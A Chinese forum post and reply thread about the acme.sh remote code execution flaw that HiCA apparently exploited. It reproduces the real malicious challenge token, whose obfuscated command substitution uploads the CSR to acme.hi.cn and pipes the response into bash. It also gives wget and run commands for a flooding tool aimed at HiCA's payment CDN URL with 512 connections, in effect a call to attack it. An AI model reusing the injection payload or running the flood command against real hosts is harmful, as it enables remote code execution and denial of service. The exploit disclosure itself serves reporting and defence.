剑皇 – acme.sh远程代码执行-gzchenjz

acme.sh 存在 RCE 漏洞，已经被国产 HiCA 利用
https://github.com/acmesh-official/acme.sh/issues/4659

{
Type: http-01
URL: ../pki-validation
Status: pending
Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#
KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw
}

相关讨论：
https://www.v2ex.com/t/947389
https://推特.com/mholt6/status/1666920303279349760
关于 HiCA：https://www.v2ex.com/t/868344

官网和acme.hi.cn用的阿里云WAF(已关闭)，支付链接是腾讯云CDN：

wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64
chmod 755 webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 512 -s https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm

热议
推荐楼 caddy 3天前

国产CA又立功了

推荐楼 elgt 1小时前

有人急了

3楼 abc.xyz 3天前

acme.sh 最近手动命令，现在默认好像是 ZeroSSL？
HiCA 是什么鬼，没听过说。。。

4楼 Ryen 前天21:05

前几天才搞完泛域名。。

6楼 justfkqq 1小时前

https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了？

7楼 mhsl 1小时前

所以大概是啥意思，有大佬翻译一下没

8楼 royzheng 1小时前

所以大概是啥意思，有大佬翻译一下没

就是利用acme.sh脚本权限漏洞，加点料，给申请ssl加入付款收费环节

9楼 莆田郑少斌 1小时前

elgt 发表于 2023-6-12 08:46
有人急了

它越急，越不能停

10楼 elgt 1小时前

https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了？

没有，应该是停用了

申明：本文内容由网友收集分享，仅供学习参考使用。如文中内容侵犯到您的利益，请在文章下方留言，本站会第一时间进行处理。